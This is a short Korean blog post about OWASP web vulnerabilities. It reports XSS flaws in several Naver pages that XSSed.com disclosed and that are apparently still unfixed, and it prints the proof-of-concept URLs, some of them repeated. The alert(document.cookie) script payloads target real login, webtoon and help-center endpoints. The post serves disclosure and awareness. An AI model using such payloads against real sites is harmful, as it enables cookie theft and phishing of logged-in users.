위 표는 OWASP에서 선정한 웹 취약점 10대 항목으로 그 심각성을 손쉽게 알 수 있습니다.
이 중에서 XSS 취약점은 로그인한 사용자의 계정 정보(쿠키 등)를 훔치거나 다른 사이트로 착각하게 하여 정보를 훔치는 피싱 공격의 주요한 수단으로 이용됩니다.
지난 주말에 XSSed.COM에서는 네이버에서 발견된 다수의 XSS 취약점에 대한 정보가 공개되었습니다. 아직 수정되지 않은 것으로 보이며, 빠른 해결이 시급합니다.
로그인: http://nid.naver.com/nidlogin.login?svctype=65536&openid.mode=checkid_setup&openid.return_to=%3C/SCR
IPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
만화: http://comic.naver.com/webtoon/detail.nhn?titleId=22045&no=227&weekday=%22%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
고객센터: http://help.naver.com/ops/step2/opsSearch.nhn?searchKeyword=http%3A%2F%2Fcomic.naver.com%2Fwebtoon%2
Fdetail.nhn%3FtitleId%3D22045%26no%3D227%26weekday%3D%2522%253E%253Cscript%253Ealert%2528document.co
okie%2529%253C%2Fscript%253E
IPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
만화: http://comic.naver.com/webtoon/detail.nhn?titleId=22045&no=227&weekday=%22%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
고객센터: http://help.naver.com/ops/step2/opsSearch.nhn?searchKeyword=http%3A%2F%2Fcomic.naver.com%2Fwebtoon%2
Fdetail.nhn%3FtitleId%3D22045%26no%3D227%26weekday%3D%2522%253E%253Cscript%253Ealert%2528document.co
okie%2529%253C%2Fscript%253E
이러한 취약점은 일반적인 방화벽이나 웹방화벽(WAF) 등으로 막기에는 한계가 있으며 근본적인 해결책은 소스를 수정하는 것으로 개발 시점부터 이러한 문제점을 고려하는 것이 좋습니다.
출처: http://xssed.com/search?key=naver
감사합니다.
댓글을 달아 주세요